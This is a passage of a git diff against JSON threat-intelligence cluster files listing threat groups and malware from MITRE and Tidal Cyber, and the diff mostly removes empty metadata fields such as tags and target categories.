"observed_countries": [], "observed_motivations": [ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Government" @@ -5030,7 +4919,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "NGOs", @@ -5074,12 +4962,10 @@ "description": "[GCMAN](https://app.tidalcyber.com/groups/dbc85db0-937d-47d7-9002-7364d41be48a) is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. [[Securelist GCMAN](https://app.tidalcyber.com/references/1f07f234-50f0-4c1e-942a-a01d3f733161)]", "meta": { "group_attack_id": "G0036", - "observed_countries": [], "observed_motivations": [ "Financial Gain" ], "source": "MITRE", - "tags": [], "target_categories": [ "Financial Services" ] @@ -5111,7 +4997,6 @@ "description": "[GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.[[Secureworks REvil September 2019](https://app.tidalcyber.com/references/8f4e2baf-4227-4bbd-bfdb-5598717dcf88)][[Secureworks GandCrab and REvil September 2019](https://app.tidalcyber.com/references/46b5d57b-17be-48ff-b723-406f6a55d84a)][[Secureworks GOLD SOUTHFIELD](https://app.tidalcyber.com/references/01d1ffaa-16b3-41c4-bb5a-afe2b41f1142)][[CrowdStrike Evolution of Pinchy Spider July 2021](https://app.tidalcyber.com/references/7578541b-1ae3-58d0-a8b9-120bd6cd96f5)]", "meta": { "group_attack_id": "G0115", - "observed_countries": [], "observed_motivations": [ "Financial Gain" ], @@ -5120,8 +5005,7 @@ "f2ae2283-f94d-4f8f-bbde-43f2bed66c55", "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" - ], - "target_categories": [] + ] }, "related": [ { @@ -5143,9 +5027,7 @@ "GB", "US" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Government" ] @@ -5163,11 +5045,7 @@ "description": "[Group5](https://app.tidalcyber.com/groups/fcc6d937-8cd6-4f2c-adb8-48caedbde70a) is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. [Group5](https://app.tidalcyber.com/groups/fcc6d937-8cd6-4f2c-adb8-48caedbde70a) has used two commonly available remote access tools (RATs), [njRAT](https://app.tidalcyber.com/software/82996f6f-0575-45cd-8f7c-ba1b063d5b9f) and [NanoCore](https://app.tidalcyber.com/software/db05dbaa-eb3a-4303-b37e-18d67e7e85a1), as well as an Android RAT, DroidJack. [[Citizen Lab Group5](https://app.tidalcyber.com/references/ffbec5e8-947a-4363-b7e1-812dfd79935a)]", "meta": { "group_attack_id": "G0043", - "observed_countries": [], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -5204,7 +5082,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Education", @@ -5272,11 +5149,7 @@ "description": "[HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735)'s TTPs appear similar to [APT33](https://app.tidalcyber.com/groups/99bbbe25-45af-492f-a7ff-7cbc57828bac) and [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2) but due to differences in victims and tools it is tracked as a separate entity.[[Dragos Hexane](https://app.tidalcyber.com/references/11838e67-5032-4352-ad1f-81ba0398a14f)][[Kaspersky Lyceum October 2021](https://app.tidalcyber.com/references/b3d13a82-c24e-4b47-b47a-7221ad449859)][[ClearSky Siamesekitten August 2021](https://app.tidalcyber.com/references/9485efce-8d54-4461-b64e-0d15e31fbf8c)][[Accenture Lyceum Targets November 2021](https://app.tidalcyber.com/references/127836ce-e459-405d-a75c-32fd5f0ab198)]", "meta": { "group_attack_id": "G1001", - "observed_countries": [], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -5307,9 +5180,7 @@ "PL", "RU" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Government" ] @@ -5413,7 +5284,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Government" ] @@ -5618,9 +5488,7 @@ "UZ", "VE" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Energy", @@ -5683,7 +5551,6 @@ "GB", "US" ], - "observed_motivations": [], "owner": "TidalCyberIan", "source": "Tidal Cyber", "tags": [ @@ -5776,7 +5643,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Education", @@ -5827,16 +5693,13 @@ "description": "[LAPSUS$](https://app.tidalcyber.com/groups/0060bb76-6713-4942-a4c0-d4ae01ec2866) is cyber criminal threat group that has been active since at least mid-2021. [LAPSUS$](https://app.tidalcyber.com/groups/0060bb76-6713-4942-a4c0-d4ae01ec2866) specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.[[BBC LAPSUS Apr 2022](https://app.tidalcyber.com/references/6c9f4312-6c9d-401c-b20f-12ce50c94a96)][[MSTIC DEV-0537 Mar 2022](https://app.tidalcyber.com/references/a9ce7e34-6e7d-4681-9869-8e8f2b5b0390)][[UNIT 42 LAPSUS Mar 2022](https://app.tidalcyber.com/references/50f4c1ed-b046-405a-963d-a113324355a3)]", "meta": { "group_attack_id": "G1004", - "observed_countries": [], - "observed_motivations": [], "source": "MITRE", "tags": [ "2e5f6e4a-4579-46f7-9997-6923180815dd", "c9c73000-30a5-4a16-8c8b-79169f9c24aa", "a2e000da-8181-4327-bacd-32013dbd3654", "5e7433ad-a894-4489-93bc-41e90da90019" - ], - "target_categories": [] + ] }, "related": [ { @@ -6002,10 +5865,7 @@ "description": "[LazyScripter](https://app.tidalcyber.com/groups/12279b62-289e-49ee-97cb-c780edd3d091) is threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets.[[MalwareBytes LazyScripter Feb 2021](https://app.tidalcyber.com/references/078837a7-82cd-4e26-9135-43b612e911fe)]", "meta": { "group_attack_id": "G0140", - "observed_countries": [], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Travel Services" ] @@ -6044,7 +5904,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Aerospace", "Construction", @@ -6182,7 +6041,6 @@ "GB", "US" ], - "observed_motivations": [], "source": "MITRE", "tags": [ "931d2342-5165-41cf-a5a9-8308d9c9f7ed" @@ -6408,7 +6266,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Government" @@ -6435,11 +6292,7 @@ "description": "[LuminousMoth](https://app.tidalcyber.com/groups/b10aa4c0-10a1-5e08-8d9d-82ce95d45e6a) is a Chinese-speaking cyber espionage group that has been active since at least October 2020. [LuminousMoth](https://app.tidalcyber.com/groups/b10aa4c0-10a1-5e08-8d9d-82ce95d45e6a) has targeted high-profile organizations, including government entities, in Myanmar, the Philippines, Thailand, and other parts of Southeast Asia. Some security researchers have concluded there is a connection between [LuminousMoth](https://app.tidalcyber.com/groups/b10aa4c0-10a1-5e08-8d9d-82ce95d45e6a) and [Mustang Panda](https://app.tidalcyber.com/groups/4a4641b1-7686-49da-8d83-00d8013f4b47) based on similar targeting and TTPs, as well as network infrastructure overlaps.[[Kaspersky LuminousMoth July 2021](https://app.tidalcyber.com/references/e21c6931-fba8-52b0-b6f0-1c8222881fbd)][[Bitdefender LuminousMoth July 2021](https://app.tidalcyber.com/references/6b1ce8bb-4e77-59f3-87ff-78f4a1a10ad3)]", "meta": { "group_attack_id": "G1014", - "observed_countries": [], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [], "uuid": "b10aa4c0-10a1-5e08-8d9d-82ce95d45e6a", @@ -6507,7 +6360,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Government", @@ -6660,7 +6512,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Construction", "Defense", @@ -6714,7 +6565,6 @@ "description": "MedusaLocker is a ransomware-as-a-service (\"RaaS\") operation that has been active since September 2019. U.S. cybersecurity authorities indicate that MedusaLocker operators have primarily targeted victims in the healthcare sector, among other unspecified sectors. Initial access for MedusaLocker intrusions originally came via phishing and spam email campaigns, but since 2022 has typically occurred via exploit of vulnerable Remote Desktop Protocol devices.[[HC3 Analyst Note MedusaLocker Ransomware February 2023](/references/49e314d6-5324-41e0-8bee-2b3e08d5e12f)]\n \nThis object represents behaviors associated with operators of MedusaLocker ransomware. As MedusaLocker is licensed on a RaaS model, affiliates likely do not act as a single cohesive unit, and behaviors observed during particular attacks may vary. Behaviors associated with samples of MedusaLocker ransomware are represented in the \"MedusaLocker Ransomware\" Software object.\n\n**Malpedia (Research)**: https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker", "meta": { "group_attack_id": "G5003", - "observed_countries": [], "observed_motivations": [ "Financial Gain" ], @@ -6926,7 +6776,6 @@ "Financial Gain" ], "source": "MITRE", - "tags": [], "target_categories": [ "Aerospace", "Construction", @@ -6984,11 +6833,7 @@ "description": "[Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b) is a suspected cyber espionage group that was first reported in September 2022. [Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b) has targeted a limited number of telecommunication companies, internet service providers, and universities in the Middle East and Africa. Security researchers named the group [Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b) based on the \"I am meta\" string in one of the group's malware samples and the expectation of Spanish-language responses from C2 servers.[[SentinelLabs Metador Sept 2022](https://app.tidalcyber.com/references/137474b7-638a-56d7-9ce2-ab906f207175)]", "meta": { "group_attack_id": "G1013", - "observed_countries": [], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [], "uuid": "a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b", @@ -7008,7 +6853,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Government", @@ -7042,7 +6886,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Automotive", "Defense", @@ -7100,7 +6943,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Banks", "Government", @@ -7145,7 +6987,6 @@ "Destruction" ], "source": "MITRE", - "tags": [], "target_categories": [ "Energy", "Financial Services", @@ -7170,7 +7011,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Government" ] @@ -7289,7 +7129,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Education", "Energy", @@ -7404,7 +7243,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Government", "NGOs", @@ -7458,7 +7296,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Government" @@ -7483,9 +7320,7 @@ "observed_motivations": [ "Cyber Espionage" ], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -7514,12 +7349,10 @@ "description": "\n[Nomadic Octopus](https://app.tidalcyber.com/groups/5f8c6ee0-f302-403b-b712-f1e3df064c0c) is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://app.tidalcyber.com/groups/5f8c6ee0-f302-403b-b712-f1e3df064c0c) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.[[Security Affairs DustSquad Oct 2018](https://app.tidalcyber.com/references/0e6b019c-cf8e-40a7-9e7c-6a7dc5309dc6)][[Securelist Octopus Oct 2018](https://app.tidalcyber.com/references/77407057-53f1-4fde-bc74-00f73d417f7d)][[ESET Nomadic Octopus 2018](https://app.tidalcyber.com/references/50dcb3f0-1461-453a-aab9-38c2e259173f)]", "meta": { "group_attack_id": "G0133", - "observed_countries": [], "observed_motivations": [ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Government" ] @@ -7623,9 +7456,7 @@ "GB", "US" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Banks", "Chemical", @@ -7699,7 +7530,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Healthcare", "Pharmaceuticals" @@ -7789,9 +7619,7 @@ "GB", "US" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Energy", @@ -7839,9 +7667,7 @@ "observed_countries": [ "TW" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Energy", @@ -7869,9 +7695,7 @@ "SG", "TH" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Education", @@ -7941,11 +7765,7 @@ "description": "[POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess [POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.[[Microsoft POLONIUM June 2022](https://app.tidalcyber.com/references/689ff1ab-9fed-4aa2-8e5e-78dac31e6fbd)]", "meta": { "group_attack_id": "G1005", - "observed_countries": [], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [], "uuid": "7fbd7514-76e9-4696-8c66-9f95546e3315", @@ -7968,7 +7788,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Energy", "Entertainment", @@ -8010,9 +7829,7 @@ "observed_motivations": [ "Cyber Espionage" ], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -8064,9 +7881,7 @@ "JP", "US" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Aerospace", "Defense", @@ -8103,9 +7918,7 @@ "observed_motivations": [ "Cyber Espionage" ], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -8169,13 +7982,10 @@ "description": "[Rocke](https://app.tidalcyber.com/groups/71222310-2807-4599-bb92-248eaf2e03ab) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://app.tidalcyber.com/groups/71222310-2807-4599-bb92-248eaf2e03ab) comes from the email address \"rocke@live.cn\" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://app.tidalcyber.com/groups/71222310-2807-4599-bb92-248eaf2e03ab) and the Iron Cybercrime Group, though this attribution has not been confirmed.[[Talos Rocke August 2018](https://app.tidalcyber.com/references/bff0ee40-e583-4f73-a013-4669ca576904)]", "meta": { "group_attack_id": "G0106", - "observed_countries": [], "observed_motivations": [ "Financial Gain" ], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [], "uuid": "71222310-2807-4599-bb92-248eaf2e03ab", @@ -8243,10 +8053,7 @@ "RU", "UA" ], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -8432,9 +8239,7 @@ "observed_countries": [ "CN" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Human Rights" ] @@ -8606,11 +8411,7 @@ "description": "[SideCopy](https://app.tidalcyber.com/groups/31bc763e-623f-4870-9780-86e43d732594) is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghani government personnel, since at least 2019. [SideCopy](https://app.tidalcyber.com/groups/31bc763e-623f-4870-9780-86e43d732594)'s name comes from its infection chain that tries to mimic that of [Sidewinder](https://app.tidalcyber.com/groups/44f8bd4e-a357-4a76-b031-b7455a305ef0), a suspected Indian threat group.[[MalwareBytes SideCopy Dec 2021](https://app.tidalcyber.com/references/466569a7-1ef8-4824-bd9c-d25301184ea4)]", "meta": { "group_attack_id": "G1008", - "observed_countries": [], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [], "uuid": "31bc763e-623f-4870-9780-86e43d732594", @@ -8663,7 +8464,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Energy", @@ -8789,7 +8589,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Education", "Government" @@ -8813,10 +8612,7 @@ "meta": { "country": "NG", "group_attack_id": "G0083", - "observed_countries": [], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Education", "Manufacturing", @@ -8845,7 +8641,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Government" ] @@ -8873,7 +8668,6 @@ ], "owner": "TidalCyberIan", "source": "Tidal Cyber", - "tags": [], "target_categories": [ "Defense", "Education", @@ -8893,9 +8687,7 @@ "observed_countries": [ "AE" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Entertainment", "Human Rights" @@ -8940,7 +8732,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Aerospace", "Defense", @@ -8973,9 +8764,7 @@ "observed_motivations": [ "Cyber Espionage" ], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -8997,7 +8786,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Aerospace", "Defense", @@ -9019,10 +8807,7 @@ "MN", "RU" ], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -9066,8 +8851,7 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172", "a98d7a43-f227-478e-81de-e7299639a355" - ], - "target_categories": [] + ] }, "related": [ { @@ -9114,13 +8898,10 @@ "description": "[TA551](https://app.tidalcyber.com/groups/8951bff3-c444-4374-8a9e-b2115d9125b2) is a financially-motivated threat group that has been active since at least 2018. [[Secureworks GOLD CABIN](https://app.tidalcyber.com/references/778babec-e7d3-4341-9e33-aab361f2b98a)] The group has primarily targeted English, German, Italian, and Japanese speakers through email-based malware distribution campaigns. [[Unit 42 TA551 Jan 2021](https://app.tidalcyber.com/references/8e34bf1e-86ce-4d52-a6fa-037572766e99)]", "meta": { "group_attack_id": "G0127", - "observed_countries": [], "observed_motivations": [ "Financial Gain" ], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -9143,14 +8924,11 @@ "description": "*Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the **Add to Matrix** button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a [60-second tutorial here](https://www.youtube.com/watch?v=4jBo3XLO01E)).*\n\nTA577 is a cybercriminal actor that has remained highly active since mid-2020. The actor is known for carrying out email-based campaigns that result in the delivery of a wide range of payloads, including at least one leading to ransomware (REvil) deployment. These campaigns are known to impact organizations in a wide range of sectors and geographic locations.[[Proofpoint Ransomware Initial Access June 2021](/references/3b0631ae-f589-4b7c-a00a-04dcd5f3a77b)] The actor appears adept at shifting payloads in response to external factors, for example moving to deliver DarkGate and Pikabot shortly after international authorities disrupted the QakBot botnet in August 2023.[[Malwarebytes Pikabot December 15 2023](/references/50b29ef4-7ade-4672-99b6-fdf367170a5b)]", "meta": { "group_attack_id": "G5019", - "observed_countries": [], "observed_motivations": [ "Financial Gain" ], "owner": "TidalCyberIan", - "source": "Tidal Cyber", - "tags": [], - "target_categories": [] + "source": "Tidal Cyber" }, "related": [], "uuid": "28f3dbcc-b248-442f-9ff3-234210bb2f2a", @@ -9160,7 +8938,6 @@ "description": "[TeamTNT](https://app.tidalcyber.com/groups/325c11be-e1ee-47db-afa6-44ac5d16f0e7) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.[[Palo Alto Black-T October 2020](https://app.tidalcyber.com/references/d4351c8e-026d-4660-9344-166481ecf64a)][[Lacework TeamTNT May 2021](https://app.tidalcyber.com/references/5908b04b-dbca-4fd8-bacc-141ef15546a1)][[Intezer TeamTNT September 2020](https://app.tidalcyber.com/references/1155a45e-86f4-497a-9a03-43b6dcb25202)][[Cado Security TeamTNT Worm August 2020](https://app.tidalcyber.com/references/8ccab4fe-155d-44b0-b0f2-941e9f8f87db)][[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)][[Trend Micro TeamTNT](https://app.tidalcyber.com/references/d6b52135-6bb2-4e37-8f94-1e1d6354bdfd)][[ATT TeamTNT Chimaera September 2020](https://app.tidalcyber.com/references/5d9f402f-4ff4-4993-8685-e5656e2f3aff)][[Aqua TeamTNT August 2020](https://app.tidalcyber.com/references/ca10ad0d-1a47-4006-8f76-c2246aee7752)][[Intezer TeamTNT Explosion September 2021](https://app.tidalcyber.com/references/e0d6208b-a4d6-45f0-bb3a-6c8681630b55)]", "meta": { "group_attack_id": "G0139", - "observed_countries": [], "observed_motivations": [ "Financial Gain" ], @@ -9170,8 +8947,7 @@ "82009876-294a-4e06-8cfc-3236a429bda4", "4fa6f8e1-b0d5-4169-8038-33e355c08bde", "2e5f6e4a-4579-46f7-9997-6923180815dd" - ], - "target_categories": [] + ] }, "related": [], "uuid": "325c11be-e1ee-47db-afa6-44ac5d16f0e7", @@ -9200,9 +8976,7 @@ "SA", "US" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Infrastructure" ] @@ -9227,9 +9001,7 @@ "observed_countries": [ "PK" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Government" @@ -9257,11 +9029,7 @@ "description": "[Threat Group-1314](https://app.tidalcyber.com/groups/0f86e871-0c6c-4227-ae28-3f3696d6ae9d) is an unattributed threat group that has used compromised credentials to log into a victim's remote access infrastructure. [[Dell TG-1314](https://app.tidalcyber.com/references/79fc7568-b6ff-460b-9200-56d7909ed157)]", "meta": { "group_attack_id": "G0028", - "observed_countries": [], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -9465,7 +9233,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Telecommunications" @@ -9550,9 +9317,7 @@ "TW", "US" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Energy", @@ -9683,9 +9448,7 @@ "GB", "US" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Government" @@ -9753,7 +9516,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Government", @@ -10129,7 +9891,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Education", @@ -10354,7 +10115,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Healthcare", "Media", @@ -10369,11 +10129,7 @@ "description": "The [Windigo](https://app.tidalcyber.com/groups/eeb69751-8c22-4a5f-8da2-239cc7d7746c) group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the [Ebury](https://app.tidalcyber.com/software/2375465a-e6a9-40ab-b631-a5b04cf5c689) SSH backdoor to create a spam botnet. Despite law enforcement intervention against the creators, [Windigo](https://app.tidalcyber.com/groups/eeb69751-8c22-4a5f-8da2-239cc7d7746c) operators continued updating [Ebury](https://app.tidalcyber.com/software/2375465a-e6a9-40ab-b631-a5b04cf5c689) through 2019.[[ESET Windigo Mar 2014](https://app.tidalcyber.com/references/721cdb36-d3fc-4212-b324-6be2b5f9cb46)][[CERN Windigo June 2019](https://app.tidalcyber.com/references/e9f1289f-a32e-441c-8787-cb32a26216d1)]", "meta": { "group_attack_id": "G0124", - "observed_countries": [], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [], "uuid": "eeb69751-8c22-4a5f-8da2-239cc7d7746c", @@ -10397,12 +10153,10 @@ "description": "[Windshift](https://app.tidalcyber.com/groups/4e880d01-313a-4926-8470-78c48824aa82) is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.[[SANS Windshift August 2018](https://app.tidalcyber.com/references/97eac0f2-d528-4f7c-8425-7531eae4fc39)][[objective-see windtail1 dec 2018](https://app.tidalcyber.com/references/7a32c962-8050-45de-8b90-8644be5109d9)][[objective-see windtail2 jan 2019](https://app.tidalcyber.com/references/e6bdc679-ee0c-4f34-b5bc-0d6a26485b36)]", "meta": { "group_attack_id": "G0112", - "observed_countries": [], "observed_motivations": [ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Government", "Infrastructure" @@ -10453,9 +10207,7 @@ "US", "VN" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Entertainment" ] @@ -10477,10 +10229,7 @@ "description": "[WIRTE](https://app.tidalcyber.com/groups/73da066d-b25f-45ba-862b-1a69228c6baa) is a threat group that has been active since at least August 2018. [WIRTE](https://app.tidalcyber.com/groups/73da066d-b25f-45ba-862b-1a69228c6baa) has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.[[Lab52 WIRTE Apr 2019](https://app.tidalcyber.com/references/884b675e-390c-4f6d-8cb7-5d97d84115e5)][[Kaspersky WIRTE November 2021](https://app.tidalcyber.com/references/143b4694-024d-49a5-be3c-d9ceca7295b2)]", "meta": { "group_attack_id": "G0090", - "observed_countries": [], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Financial Services", @@ -10715,7 +10464,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Aerospace", "Construction", diff --git a/clusters/tidal-software.json b/clusters/tidal-software.json index f71c97a..d0fac83 100644 --- a/clusters/tidal-software.json +++ b/clusters/tidal-software.json @@ -240,7 +240,6 @@ ], "software_attack_id": "S1028", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -264,7 +263,6 @@ ], "software_attack_id": "S0202", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -846,7 +844,6 @@ ], "software_attack_id": "S1074", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -1063,7 +1060,6 @@ ], "software_attack_id": "S0456", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -1464,7 +1460,6 @@ ], "software_attack_id": "S0438", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -1498,7 +1493,6 @@ ], "software_attack_id": "S0347", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -1526,7 +1520,6 @@ ], "software_attack_id": "S0129", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -1817,7 +1810,6 @@ ], "software_attack_id": "S0093", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -1919,7 +1911,6 @@ ], "software_attack_id": "S0245", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -1969,7 +1960,6 @@ ], "software_attack_id": "S1081", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -1993,7 +1983,6 @@ ], "software_attack_id": "S0128", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -2017,7 +2006,6 @@ ], "software_attack_id": "S0337", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -2320,7 +2308,6 @@ ], "software_attack_id": "S0127", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -2427,7 +2414,6 @@ ], "software_attack_id": "S0017", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -2711,7 +2697,6 @@ ], "software_attack_id": "S0069", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -2757,7 +2742,6 @@ ], "software_attack_id": "S0089", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -2785,7 +2769,6 @@ ], "software_attack_id": "S0564", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -2809,7 +2792,6 @@ ], "software_attack_id": "S0520", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -2920,7 +2902,6 @@ ], "software_attack_id": "S0486", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -2940,7 +2921,6 @@ ], 